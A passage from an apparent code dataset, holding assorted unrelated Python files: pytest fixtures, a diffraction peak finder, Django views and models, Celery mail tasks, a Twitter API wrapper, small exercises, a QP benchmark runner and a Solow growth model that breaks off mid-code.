group\n\n\n@pytest.fixture\ndef group_3g_empty_v0():\n    \"\"\"A minibatch of group indices.\"\"\"\n    # Create a simple batch (batch_size=5).\n    group = tf.constant(\n        np.array(\n            [\n                [0, 1, 0],\n                [0, 1, 0],\n                [0, 2, 0],\n                [0, 1, 1],\n                [0, 2, 1]\n            ], dtype=np.int32\n        )\n    )\n    return 
group\n","sub_path":"tests/keras/layers/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":4473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"259610553","text":"import numpy as np\nimport os\nfrom collections import *\n\nchiFileFolder = './basicInfo/chi/'\ndef extractSingleChiFile(chiFileFolder, i, j, startIndex = 1000, endIndex = 3500):\n    fileName = str(i) + '_' + str(j) + '_rm.chi'\n    chiFileAbsPath = os.path.join(chiFileFolder, fileName)\n    TThetaList = []\n    intensityList = []\n    with open(chiFileAbsPath, 'r') as chiFile:\n        count = 0\n        for line in chiFile.readlines():\n            if (count > 3):\n                ttheta, *_, intensity = line.strip().split(' ')\n                TThetaList.append(float(ttheta))\n                intensityList.append(float(intensity))\n            count += 1\n    chiDict = {'TTheta':TThetaList[startIndex:endIndex], 'Intensity':intensityList[startIndex:endIndex]}\n    return chiDict\ndef extractSingleTxtFile(i, j, startIndex = 1100, endIndex = 1700, txtFileFolder='./basicInfo/chi/chi2txt/afterCalibrated', ):\n# def extractSingleTxtFile(i, j, startIndex = 1100, endIndex = 1700, txtFileFolder='./basicInfo/chi/chi2txt/afterCalibrated/smoothed', ):\n    fileName = str(i) + '_' + str(j) + '_rm.txt'\n    # fileName = str(i) + '_' + str(j) + '_rm_SG_RM.txt'\n    txtFileAbsPath = os.path.join(txtFileFolder, fileName)\n    TThetaList = []\n    intensityList = []\n    with open(txtFileAbsPath, 'r') as file:\n        for line in file.readlines():\n            ttheta, intensity = line.strip().split(' ')\n            TThetaList.append(float(ttheta))\n            intensityList.append(float(intensity))\n    txtDict = {'TTheta':TThetaList[startIndex:endIndex], 'Intensity':intensityList[startIndex:endIndex]}\n    return txtDict\ndef filterLocalMaximum(yDeque, selYDeque):\n    y = deque()\n    for selY in selYDeque:\n        index = yDeque.index(selY)\n        if yDeque[index] > yDeque[index - 1]:\n            y.append(selY)\n    return y\ndef getRelativeHeight(yDeque, selYDeque):\n    relativeHeightDeque = deque()\n    for selY in selYDeque:\n        index = yDeque.index(selY)\n        topVal = yDeque[index]\n        bottomVal = 0\n        cond = True\n        while cond:\n            if (yDeque[index-1] <= yDeque[index]) and (index >= 1):\n                index -= 1\n            else:\n                bottomVal = yDeque[index]\n                cond = False\n        relativeHeightDeque.append(topVal - bottomVal)\n    return relativeHeightDeque\ndef findPeaks(i, j, startIndex = 350, endIndex = 1000, initialHeight = 50, peaksNum = 12):\n    txtDict = extractSingleTxtFile(i, j, startIndex, endIndex)\n    TThetaDeque = deque(txtDict['TTheta'])\n    IntensityDeque = deque(txtDict['Intensity'])\n\n    selIntensityDeque = deque()\n    for i in range(1, len(IntensityDeque) - 1):\n        r = (IntensityDeque[i] - IntensityDeque[i-1]) * (IntensityDeque[i] - IntensityDeque[i+1])\n        if (r > 0):\n            selIntensityDeque.append(IntensityDeque[i])\n    selIntensityDeque = filterLocalMaximum(IntensityDeque,selIntensityDeque)\n    relativeHeightDeque = getRelativeHeight(IntensityDeque, selIntensityDeque)\n\n    finalTThetaDeque = deque()\n    finalIntensityDeque = deque()\n    finalRelativeHeight = deque()\n    cond = True\n    while cond:\n        for h in relativeHeightDeque:\n            if h > initialHeight:\n                finalRelativeHeight.append(h)\n                finalIntensityDeque.append(selIntensityDeque[relativeHeightDeque.index(h)])\n        if len(finalIntensityDeque) > peaksNum:\n            initialHeight += 1\n            finalIntensityDeque = deque()\n            finalRelativeHeight = deque()\n        else:\n            cond = False\n    for intensity in finalIntensityDeque:\n        finalTThetaDeque.append(TThetaDeque[IntensityDeque.index(intensity)])\n    # Round all TTheta values to 3 decimal places\n    # finalTThetaDeque = [round(TTheta, 3) for TTheta in 
finalTThetaDeque]\n    # Round all TTheta values to 2 decimal places\n    # finalTThetaDeque = [round(TTheta, 2) for TTheta in finalTThetaDeque]\n    # Round all TTheta values to 1 decimal place\n    finalTThetaDeque = [round(TTheta, 1) for TTheta in finalTThetaDeque]\n    # Round all TTheta values to 0 decimal places\n    # finalTThetaDeque = [round(TTheta) for TTheta in finalTThetaDeque]\n    peakDict = {'TTheta':finalTThetaDeque, 'Intensity':finalIntensityDeque, 'RelativeHeight':finalRelativeHeight}\n    return peakDict\n# -----------------------------Test-----------------------------------------\n# a = findPeaks(1, 4, startIndex = 1100, endIndex = 1705, initialHeight = 50, peaksNum = 12)\n# for index in range(len(a['TTheta'])):\n# print('TTheta',a['TTheta'][index])\n# print('Intensity', a['Intensity'][index])\n# print('RelativeHeight', a['RelativeHeight'][index])\n# print('-----------------')","sub_path":"python_src/findPeaksV2.py","file_name":"findPeaksV2.py","file_ext":"py","file_size_in_byte":4602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"306889624","text":"# To use, run \"pytest <filename>\" from the terminal\nimport os\nimport pytest\n\nimport lesson_unittest\n\nclass TestCal(object):\n\n    @classmethod\n    def setup_class(cls):\n        cls.cal = lesson_unittest.Cal()\n        cls.test_file_name = 'test.txt'\n\n    def test_add_num_and_double(self, csv_file):\n        print(csv_file)\n        assert self.cal.add_num_and_double(1, 1) == 4\n\n    def test_save(self, tmpdir):\n        self.cal.save(tmpdir, self.test_file_name)\n        test_file_path = os.path.join(tmpdir, self.test_file_name)\n        assert os.path.exists(test_file_path) is True","sub_path":"section14/lesson_pytest_fixture2.py","file_name":"lesson_pytest_fixture2.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"506637795","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse\n\nimport json\n\nfrom .models import Schema\n\n# Create your views here.\ndef recluit(request):\n    if request.method == 'POST':\n        experience_about = request.POST.get('desc')\n        experience_type = request.POST.get('about')\n        recluit_motive = request.POST.get('motive')\n        recluit_name = request.POST.get('name')\n        recluit_email = request.POST.get('mail')\n        recluit_phone = request.POST.get('phone')\n\n        response_data = {}\n\n        schema = Schema(experience_type=experience_type,experience_about=experience_about,recluit_motive=recluit_motive,recluit_name=recluit_name,recluit_email=recluit_email,recluit_phone=recluit_phone)\n        schema.save()\n        \n        return redirect('/landing/gracias')\n    else:\n        return HttpResponse(\n            json.dumps({\"nothing to see\": \"this isn't happening\"}),\n            content_type=\"application/json\"\n        )","sub_path":"recluit/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"322928636","text":"from django.db import models\n\n# spelling corrections from CSV and abugames\nCHANGE_ANGELS_TO_ANGLES = True\nCORRECT_VENGENANCE_VENGEANCE = True\n\n\nclass CardSet(models.Model):\n    full_name = models.CharField(max_length=200, null=True)\n    set_name = models.CharField(max_length=200, null=True)\n    search_name = models.CharField(db_index=True, max_length=200)\n    abu_name = models.CharField(max_length=200, null=True)\n    abu_price = models.FloatField(null=True)\n    abu_quantity = models.IntegerField(null=True)\n    abu_store_id = models.CharField(max_length=200, null=True)\n    last_updated = 
models.DateTimeField('date published', null=True)\n\n    def __str__(self):\n        return self.full_name\n\n    def name_check(self, abu_name):\n        if self.search_name in abu_name:\n            return True\n        cleaned_name = str(self.search_name).lower().replace(' ', '').replace(\":\", \"\").replace(\"&\", \"and\").replace(\n            'dueldecks', '').replace('globalseries', '')\n        abu_name = str(abu_name).lower().replace(' ', '')\n        if CHANGE_ANGELS_TO_ANGLES and 'angels' in cleaned_name:\n            cleaned_name = cleaned_name.replace('angels', 'angles')\n        if CORRECT_VENGENANCE_VENGEANCE and 'vengenance' in cleaned_name:\n            cleaned_name = cleaned_name.replace('vengenance', 'vengeance')\n        if cleaned_name in abu_name:\n            return True\n        return False\n\n\nclass CardSetCardMap(models.Model):\n    set = models.ForeignKey('CardSet', on_delete=models.CASCADE)\n    card = models.ForeignKey('Card', on_delete=models.CASCADE)\n    quantity_in_set = models.IntegerField()\n\n\nclass Card(models.Model):\n    abu_name = models.CharField(db_index=True, max_length=200, null=True)\n    abu_edition = models.CharField(db_index=True, max_length=200, null=True)\n    abu_latest_price_trade = models.FloatField(null=True)\n    abu_latest_price_buy = models.FloatField(null=True)\n    abu_card_number = models.CharField(db_index=True, max_length=20, null=True)\n    last_updated = models.DateTimeField('date published', null=True)\n    abu_buy_list_quantity = models.IntegerField(null=True)\n    abu_multiverse_id = models.CharField(max_length=200, null=True)\n    abu_title = models.CharField(db_index=True, max_length=200, null=True)\n\n    def __str__(self):\n        return self.abu_name\n","sub_path":"web_app/magic_model/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"337381874","text":"\"\"\"\nWrite a program to print the sum of all the digits of a given number.\nExample:\nI/P:1234\nO/P:10\n\"\"\"\n\n\nnum = int(input('enter the number - '))\ntotal = 0\n\nwhile num > 0:\n    r = num % 10\n    total = total + r\n    num = num // 10\n\nprint(total)\n","sub_path":"python/python fundamentals/python fundamentals/prog_8_sum_of_digits.py","file_name":"prog_8_sum_of_digits.py","file_ext":"py","file_size_in_byte":220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"49136139","text":"from __future__ import print_function\nimport numpy as np\n\n# Run QP tests from different examples\nfrom qp_examples.basis_pursuit import basis_pursuit\nfrom qp_examples.huber_fit import huber_fit\nfrom qp_examples.lasso import lasso\nfrom qp_examples.lp import lp\nfrom qp_examples.nonneg_l2 import nonneg_l2\nfrom qp_examples.portfolio import portfolio\nfrom qp_examples.svm import svm\n\n# from multiprocessing import Process, Queue\nfrom multiprocessing import Pool, cpu_count\nfrom functools import partial\n\n\nimport pandas as pd\n# pd.set_option('display.width', 1000)  # See all the columns\n# import matplotlib.pyplot as plt\n# import seaborn as sns\n# ipdb.set_trace()\n\nfrom time import time\n# import ipdb\n\n# Define test ranges\nrho_vec_len = 30  # Define rho vector\nrho_vec = np.logspace(-6., 6., rho_vec_len)\n# rho_vec = np.array([1000])\n\n\n# sigma_vec_len = 10  # Define sigma vector\n# sigma_vec = np.logspace(-4., 3., sigma_vec_len)\nsigma_vec = np.array([1e-06])\n\n\n# alpha_vec_len = 10  # Define alpha vector\n# alpha_vec = np.linspace(0.1, 1.9, alpha_vec_len)\nalpha_vec = np.array([1.6])\n# alpha_vec = np.array([1.6])\n\n\n\ndim_vecs_len = 30\n# n_vec = np.array([20])\n# m_vec 
= np.array([30])\nn_max = 500\nm_max = 1000\nn_vec = np.arange(10, n_max, int(n_max/dim_vecs_len))\nm_vec = np.arange(10, m_max, int(m_max/dim_vecs_len))\n\n\n# Number of problems with the same dimensions\nnm_num_prob = 25\n\n# Test options\noptions = {'verbose': False,\n           'polish': False,\n           'early_terminate_interval': 1,\n           'max_iter': 2500}\n\n# Test types\ntest_types = ['basis_pursuit', 'huber_fit', 'lasso',\n              'nonneg_l2', 'lp', 'portfolio', 'svm']\n\n# test_types = ['lasso', 'svm']\n\n\ndef run_examples(test_type, n_vec, m_vec, rho_vec, sigma_vec,\n                 alpha_vec, nm_num_prob, **kwargs):\n    if test_type == 'basis_pursuit':\n        return basis_pursuit.run_tests(n_vec, m_vec, rho_vec, sigma_vec,\n                                       alpha_vec, nm_num_prob, **kwargs)\n    elif test_type == 'huber_fit':\n        return huber_fit.run_tests(n_vec, m_vec, rho_vec, sigma_vec,\n                                   alpha_vec, nm_num_prob, **kwargs)\n    elif test_type == 'lasso':\n        return lasso.run_tests(n_vec, m_vec, rho_vec, sigma_vec,\n                               alpha_vec, nm_num_prob, **kwargs)\n    elif test_type == 'nonneg_l2':\n        return nonneg_l2.run_tests(n_vec, m_vec, rho_vec, sigma_vec,\n                                   alpha_vec, nm_num_prob, **kwargs)\n    elif test_type == 'lp':\n        return lp.run_tests(n_vec, m_vec, rho_vec, sigma_vec,\n                            alpha_vec, nm_num_prob, **kwargs)\n    elif test_type == 'portfolio':\n        return portfolio.run_tests(n_vec, m_vec, rho_vec, sigma_vec,\n                                   alpha_vec, nm_num_prob, **kwargs)\n    elif test_type == 'svm':\n        return svm.run_tests(n_vec, m_vec, rho_vec, sigma_vec,\n                             alpha_vec, nm_num_prob, **kwargs)\n\n\n# PARALLEL IMPLEMENTATION\n# ------------------------------------------------------------------------------\n\npartial_tests = partial(run_examples, n_vec=n_vec,\n                        m_vec=m_vec, rho_vec=rho_vec, sigma_vec=sigma_vec,\n                        alpha_vec=alpha_vec, nm_num_prob=nm_num_prob, **options)\n\n\nt = time()\n\n# Execute problems in parallel\np = Pool(cpu_count())\nresults = p.map(partial_tests, test_types)\n\n\n# Execute problems in series\n# results = []\n# for i in range(len(test_types)):\n    # res = partial_tests(test_types[i])\n    # results.append(res)\n\ncputime = time() - t\nprint(\"total cputime = %.4f sec\" % cputime)\n\n# Concatenate dataframes\nresults = pd.concat(results)\n\n\n# Export results\nresults.to_csv('results/results.csv', index=False)\n","sub_path":"interfaces/python/tests/qp_problems/run_qpexamples.py","file_name":"run_qpexamples.py","file_ext":"py","file_size_in_byte":3733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"206013284","text":"# _*_ coding: utf-8 _*_\n'my first Learning Machine'\n__author__ = 'Beans Lee'\n\nimport knn\nimport operator\nfrom numpy import tile\n\ngroup, labels = knn.creatDataSet()\nprint('group = ', group)\nprint('labels = ', labels)\n\ndef classify0(inX, dataSet, labels, k):\n    dataSetSize = dataSet.shape[0]\n    diffMat = tile(inX, (dataSetSize, 1)) - dataSet\n    sqDiffMat = diffMat**2\n    sqDistances = sqDiffMat.sum(axis=1)\n    distances = sqDistances**0.5\n    sortedDistIndicies = distances.argsort()\n    classCount = {}\n    for i in range(k):\n        voteIlabel = labels[sortedDistIndicies[i]]\n        classCount[voteIlabel] = classCount.get(voteIlabel, 0) + 1\n    sortedClassCount = sorted(classCount.items(), key=operator.itemgetter(1), reverse=True)\n    return sortedClassCount[0][0]\n\nprint('Classifier test results:')\nprint('[0,0]: ' + classify0([0, 0], group, labels, 3))\n\n","sub_path":"kNN/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
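A quick inline sanity check for the classify0 routine in the kNN record above; a minimal sketch in which the four-point dataset is illustrative stand-in data (the real values come from knn.creatDataSet(), which is not shown here), and classify0 is assumed to be the function defined above:

import numpy as np
import operator
from numpy import tile

# Stand-in data in place of knn.creatDataSet(); the values are assumed for illustration.
group = np.array([[1.0, 1.1], [1.0, 1.0], [0.0, 0.0], [0.0, 0.1]])
labels = ['A', 'A', 'B', 'B']

# With k=3, a point near the origin is outvoted by its two 'B' neighbours,
# and a point near (1, 1) by its two 'A' neighbours.
assert classify0([0, 0], group, labels, 3) == 'B'
assert classify0([1, 1], group, labels, 3) == 'A'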
+{"seq_id":"334406633","text":"\nfrom requests_oauthlib import OAuth1\nfrom PIL import Image\nimport urllib\nimport io\nimport requests\nimport json\nimport re\nimport os\n\ntry:\n    # python 3\n    from urllib.parse import urlparse, urlunparse, urlencode\n    from urllib.request import urlopen\n    from urllib.request import __version__ as urllib_version\nexcept ImportError:\n    from urlparse import urlparse, urlunparse\n    from urllib2 import urlopen\n    from urllib import urlencode\n    from urllib import __version__ as urllib_version\n\n\nfrom .models import *\n\nclass Api:\n    '''\n    Consumer and consumer secret keys are required for authentication.\n    '''\n    def __init__(self,\n                 consumer_key = None,\n                 consumer_secret = None,\n                 access_token = None,\n                 access_token_secret = None,\n                 ):\n\n        self.base_url = 'https://api.twitter.com/1.1'\n        self.stream_url = 'https://stream.twitter.com/1.1'\n        self.firehose = 'https://stream.twitter.com/1.1/statuses/firehose.json'\n        self._auth = None\n        self.auth_list = None\n        self.SetCredential(consumer_key,\n                           consumer_secret,\n                           access_token,\n                           access_token_secret)\n\n    def SetCredential(self,\n                      consumer_key,\n                      consumer_secret,\n                      access_token,\n                      access_token_secret):\n\n        self.auth_list = [consumer_key,consumer_secret,access_token,access_token_secret]\n        if all(self.auth_list):\n            self._auth = OAuth1(consumer_key,\n                                consumer_secret,\n                                access_token,\n                                access_token_secret)\n\n    def StatusUpdate(self,status):\n        param = {'status':status}\n        url = '%s/statuses/update.json' % self.base_url\n        res = self.GetPost(url=url,data=param)\n        return res\n\n\n    def GetTrends(self,\n                  id,\n                  exclude=None):\n        '''\n        id: The Yahoo! Where On Earth ID (WOEID) of the location to return trending\n        information for. Global information is available by using 1 as the\n        woeid.\n        exclude: setting this equal to hashtags will remove all hashtags\n        from the trends list.\n        '''\n        param = {}\n        url = '%s/trends/place.json' % self.base_url\n        if id:\n            param['id']=id\n        if exclude:\n            param['exclude']=exclude\n        res = self.GetRes(url,param)\n        data = self.Parse(res.content.decode('utf-8'))\n        list = []\n        for x in data:\n            list.append(x['trends'])\n        l = [Trends().AsDict(x) for x in list[0]]\n        return l\n\n    def GetTrendsTweets(self):\n        parse_stuff = [urlparse(x.url) for x in self.GetTrends(id=1)]\n        #obj = [self.GetTweets(x.query[2:]) for x in parse_stuff]\n        return parse_stuff\n\n    def TrendsAvailable(self):\n        url = '%s/trends/available.json' % self.base_url\n        res = self.GetRes(url)\n        data = self.Parse(res.content.decode('utf-8'))\n        return [Trends().AsDict(x) for x in data]\n    \n    \n    def GetStatusStreamy(self,\n                         follow=None,\n                         delimited=None,\n                         stall_warnings=None,\n                         track=None,\n                         _with=None,\n                         language=None,\n                         location=None):\n        '''\n        delimited; specify the length if you wish to use it.\n        stall_warnings; This parameter may be used on all streaming endpoints, unless explicitly noted.\n        follow; A comma-separated list of user IDs\n        for more details, visit: https://dev.twitter.com/streaming/overview/request-parameters \n        '''\n        url = '%s/statuses/filter.json' % self.stream_url\n\n        param = {}\n        if _with:\n            param['with']=_with\n        if delimited:\n            param['delimited']=delimited\n        if stall_warnings:\n            param['stall_warnings']=stall_warnings\n        if follow:\n            param['follow']=follow\n        if track:\n            param['track']=track\n        if location:\n            param['location']=location\n        if language:\n            param['language']=language\n\n        res = self.GetStreamRes(url,data=param)\n        resp = res.decode('utf-8')\n        return resp\n\n    def GetStreamHashtagsFind(self,track):\n        stream = 
self.GetStatusStreamy(track=track)\n        return Parse_tweet(stream).GetHashTag()\n\n    def GetMedia(self,screen_name,count=None):\n        \"\"\"\n        default count is set to 20. \n        \"\"\"\n        if count:\n            timeline=self.GetUserTimeLine(screen_name=screen_name,count=count)\n        else:\n            timeline=self.GetUserTimeLine(screen_name=screen_name,count=20)\n        timel=([x.entities for x in timeline])\n        media=re.findall(r'http://pbs.twimg.com/media/[a-zA-Z0-9]+',str(timel))\n        list = []\n        image_list= []\n        for x in set(media):\n            url = x + \".jpg\"\n            list.append(url)\n        for image in list:\n            try:\n                x = urlopen(image)\n                y = io.BytesIO(x.read())\n                image_list.append(Image.open(y))\n            except:\n                pass\n        return image_list\n\n    def SaveImg(self,path=None,screen_name=None):\n        if path is None:\n            path='Desktop'\n        # Save each image under its own random file name.\n        saved = []\n        for x in self.GetMedia(screen_name,count=None):\n            p = os.path.expanduser('~/%s'%path+'/'+os.urandom(10).hex()+'.png')\n            saved.append(x.save(p,format='PNG'))\n        return saved\n\n    def GetUserTimeLine(self,user_id=None,\n                        screen_name=None,\n                        since_id=None,\n                        count=None,\n                        max_id=None,\n                        trim_user=None,\n                        exclude_replies=None,\n                        contribute_details=None,\n                        include_rts=None,\n                        ):\n        param = {}\n        url = \"%s/statuses/user_timeline.json\" % self.base_url\n        if user_id:\n            param['user_id']=user_id\n        if screen_name:\n            param['screen_name']=screen_name\n        if count:\n            param['count']=count\n        if max_id:\n            param['max_id']=max_id\n        if trim_user:\n            param['trim_user']=trim_user\n        if exclude_replies:\n            param['exclude_replies']=exclude_replies\n        if contribute_details:\n            param['contribute_details']=contribute_details\n        if include_rts:\n            param['include_rts']=include_rts\n\n        res = self.GetRes(url,param)\n        data = self.Parse(res.content.decode('utf-8'))\n        return [Timeline().AsDict(x) for x in data]\n\n    def GetUser(self,screen_name=None,\n                user_id=None,\n                include_entities=None):\n        \"\"\"\n        Either screen_name or user_id is required; otherwise you won't get a user.\n        \"\"\"\n        param = {}\n        url = \"%s/users/show.json\" % self.base_url\n        \n        if screen_name:\n            param['screen_name']=screen_name\n        if user_id:\n            param['user_id']=user_id\n        if include_entities:\n            param['include_entities']=include_entities\n        res = self.GetRes(url,param)\n        data = self.Parse(res.content.decode('utf-8'))\n        return User.AsDict(data)\n    \n    \n    def GetUsersSearch(self,screen_name=None,\n                       id=None,\n                       page=1,\n                       count=20):\n        '''\n        Only the first 1,000 matching results are available.\n        default page is set to 1.\n        default count is set to 20.\n        go to reference: https://dev.twitter.com/rest/reference/get/users/search\n        '''\n        \n        param = {}\n        if screen_name:\n            param['q'] = screen_name\n        if id:\n            param['q'] = id\n        if page is not None:\n            param['page'] = page\n        if count is not None:\n            param['count'] = count\n        url = '%s/users/search.json' % self.base_url\n        res = self.GetRes(url,param)\n        data = self.Parse(res.content.decode('utf-8'))\n        return [User.AsDict(x) for x in data]\n\n    \n    def GetTweets(self,\n                  q,\n                  geocode=None,\n                  lang=None,\n                  locale=None, \n                  result_type=None,\n                  count=None,\n                  until=None,\n                  since_id=None,\n                  max_id=None,\n                  include_entities=None,\n                  ):\n        '''\n        query reference: https://dev.twitter.com/rest/reference/get/search/tweets\n        \n        # \"q\" is required; otherwise, you get nothing.\n        # \"locale\" is only available for Japanese. 
I am proud of being Japanese.\n        # \"result_type\" enables you to specify what type of search results you look for.\n        mixed, for instance, includes both popular and real-time results in the response.\n        example values: mixed, recent, popular.\n        # \"count\" specifies the number of tweets, up to a maximum of 100 <3 \n        # \"until\" you will get tweets created before the given date.\n        '''\n        url = '%s/search/tweets.json' % self.base_url\n\n        param = {}\n        param['q']=q\n        if geocode:\n            param['geocode']=geocode\n        if lang:\n            param['lang']=lang\n        if locale:\n            param['locale']=locale\n        if result_type:\n            param['result_type']=result_type\n        if count:\n            param['count']=count\n        if until:\n            param['until']=until\n        if since_id:\n            param['since_id']=since_id\n        if max_id:\n            param['max_id']=max_id\n        if include_entities:\n            param['include_entities']=include_entities\n        \n        res = self.GetRes(url,param)\n        data = self.Parse(res.content.decode('utf-8'))\n        status = data.get('statuses', [])\n        meta = data['search_metadata']\n        return [Tweets().AsDict(x) for x in status]\n    \n    \n    def GetStreamRes(self,url,data=None):\n        if data:\n            url = self.UrlBuilder(url,parameters=data)\n        res = requests.get(url,auth=self._auth,stream=True)\n        for line in res.iter_lines(): #When stream=True is set on the request, this avoids reading the content at once into memory for large responses.\n            res = line \n        return res\n\n    def GetPost(self,url=None,data=None):\n        url = self.UrlBuilder(url,parameters=data)\n        res = requests.post(url,data=data,auth=self._auth,timeout=10)\n        return res\n\n    \n    def GetRes(self,url,data=None):\n        if data:\n            url = self.UrlBuilder(url,parameters=data)\n        res = requests.get(url,auth=self._auth)\n        return res\n    \n\n\n    def UrlBuilder(self,url=None,parameters=None):\n        '''\n        parameters must be hash elements.\n        '''\n        if url is None:\n            url = self.base_url\n\n        (scheme,netloc,path,params,query,fragment) = urlparse(url)\n        \n        if parameters is not None and len(parameters)>0:\n            q = urlencode(parameters)\n            if query:\n                query += '&'+q\n            else:\n                query = q\n\n        return urlunparse((scheme,netloc,path,params,query,fragment))\n\n\n    def Parse(self,data):\n        '''\n        Turn data into json here.\n        '''\n        try:\n            data = json.loads(data)\n\n        except Exception as er:\n            raise er\n\n        return data\n\n\ndef GetHashTag(data):\n    r = re.compile(r\"(?P<tag>[\\#][\\w+]+)\")\n    word = re.compile(r\"(?P<word>[\\w+]+)\")\n    return r.findall(str(data))\n","sub_path":"twitter/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":12001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"549571511","text":"\r\nfrom celery import shared_task\r\nfrom time import sleep\r\n\r\nfrom django.core.mail import send_mail\r\n\r\nfrom .models import StudentProfile\r\nfrom django.shortcuts import render, redirect,HttpResponse\r\nfrom django.conf import settings\r\nfrom celery.task.schedules import crontab\r\nfrom celery.decorators import periodic_task\r\n\r\n\r\n@shared_task\r\ndef send_mail_task():\r\n    print(\"zilani\")\r\n    ak = StudentProfile.objects.all()\r\n    # print(ak)\r\n    mail_list = []\r\n    for v in ak:\r\n        mail_list.append(v.email)\r\n    print(mail_list)\r\n\r\n    send_mail(\"celery task check!\",'This proved the Task worked properly','humyaira2019@gmail.com',mail_list)\r\n    return None\r\n\r\n\r\n@shared_task\r\ndef single_send_mail_task():\r\n\r\n    send_mail(\"celery task 
check!\",'This proved the Task worked properly','humyaira2019@gmail.com',['sadmanshihab111@gmail.com'])\r\n    return None\r\n\r\n\r\n@periodic_task(\r\n    run_every=(crontab(minute='*/25')),\r\n    name=\"send_mail\",\r\n    ignore_result=True\r\n)\r\n@shared_task\r\ndef sleepy(duration):\r\n    sleep(duration)\r\n    return None\r\n","sub_path":"student/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"633887785","text":"'''\nProject Euler: Problem 1: Multiples of 3 and 5\nIf we list all the natural numbers below 10 that are multiples of 3 or 5, we get 3, 5, 6 and 9. The sum of these multiples is 23.\n\nFind the sum of all the multiples of 3 or 5 below the provided parameter value number.\n'''\n\ndef multiplesOf3and5(number):\n    result = 0\n    for i in range(number):\n        if (i % 3) == 0 or (i % 5) == 0:\n            result += i\n    return result\n    \nprint(multiplesOf3and5(1000))\n","sub_path":"problem001.py","file_name":"problem001.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"42078608","text":"\n# coding: utf-8\n\n# In[18]:\n\n\n##\n## Solow model\n## Description: Implements a Solow growth model in Python\n## Author: Guilherme Luft Mendes\n## Date: 09/12/2017\n## Version: 1.0\n##\n\n\n# In[19]:\n\n\n## Library imports\nimport math\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\n# In[79]:\n\n\n# Model construction\nclass Solow():\n    '''\n    Solow model\n    '''\n    \n    def __init__(self, tech=1, techGrowth=0, stochasticProcess=None, capital=1, labour=1, labourGrowth=0,\n                 depreciation=0, savings=0, theta=0):\n        '''\n        Initializes the model\n        '''\n        \n        # -- Parameters --\n        self.tech = tech  # Technology\n        self.techGrowth = techGrowth  # Technological growth (%)\n        self.stochasticProcess = stochasticProcess  # Stochastic process (lambda function)\n        self.capital = capital  # Total capital stock\n        self.labour = labour  # Total labour stock\n        self.labourGrowth = labourGrowth  # Labour force growth (%)\n        self.depreciation = depreciation  # Capital depreciation (%)\n        self.savings = savings  # Savings rate (%)\n        self.theta = theta  # Capital share of income (Cobb-Douglas)\n        \n        self.lastStochastic = None\n    \n    def function(self):\n        '''\n        Production function (Cobb-Douglas)\n        '''\n        \n        return self.capital ** self.theta * self.labour ** (1-self.theta)\n    \n    def production(self):\n        '''\n        Production: technology * production function\n        '''\n        \n        return self.tech * self.function()\n    \n    def productionPW(self):\n        '''\n        Production per worker\n        '''\n        \n        return self.production() / self.labour\n    \n    def nextK(self):\n        '''\n        Total capital stock in period t+1\n        '''\n        \n        return (1 - self.depreciation) * self.capital + self.savings * self.production()\n    \n    def loglin(self):\n        '''\n        Log-linear approximation of capital per worker in t+1\n        '''\n        \n        b = (1 + self.theta * self.labourGrowth - self.depreciation*(1-self.theta)) / (1 + self.labourGrowth)\n        c = (self.depreciation + self.labourGrowth) / (1 + self.labourGrowth)\n        \n        return (b * self.capitalPW() + c * self.lastStochastic)\n    \n    def nextL(self):\n        '''\n        Next labour force level\n        '''\n        \n        return self.labour * (1 + self.labourGrowth)\n    \n    def nextT(self):\n        '''\n        Next technology level\n        '''\n        \n        # If there is a stochastic process, draw from it\n        if self.stochasticProcess is not None:\n            st = 
self.stochasticProcess()\n            self.lastStochastic = st\n            return st\n        \n        # Otherwise, apply the geometric growth rate\n        else:\n            return self.tech * (1 + self.techGrowth)\n        \n    def update(self):\n        '''\n        Updates the capital, labour and technology levels, moving from\n        period t to period t+1\n        '''\n        \n        self.capital = self.nextK()\n        self.labour = self.nextL()\n        self.tech = self.nextT()\n        \n    def capitalPW(self):\n        '''\n        Capital per worker\n        '''\n        \n        return self.capital / self.labour\n        \n    def stationary(self):\n        '''\n        Returns capital per worker in the steady state\n        '''\n        \n        return ((self.savings * self.tech) / (self.depreciation + self.labourGrowth)) ** (1 / (1 - self.theta))\n    \n    def KGR(self):\n        '''\n        Returns the growth rate of capital per worker (capital growth)\n        '''\n        \n        return self.nextK() / self.capital\n    \n    def stationaryKGR(self):\n        '''\n        Returns the growth rate of capital per worker in the steady state\n        '''\n        \n        return ((1 + self.techGrowth) ** (1 / (1 - self.theta)))\n    \n    def goldenSavings(self):\n        '''\n        Returns the golden-rule savings rate, i.e. the savings level that\n        maximizes welfare in the steady state\n        '''\n        \n        return ((self.depreciation + self.labourGrowth) / (self.theta * self.tech)) ** (1 / (1 - self.theta))\n    \n    \n    def ts(self, length, log=False):\n        '''\n        Generates a time series of the evolution of capital per worker\n        length : length of the series\n        log : if True, also generates a parallel series with the log-linear approximations\n        '''\n        \n        data = []\n        logs = []\n        \n        for i in range(length+1):\n            data.append(self.capitalPW())\n            \n            if log == True and 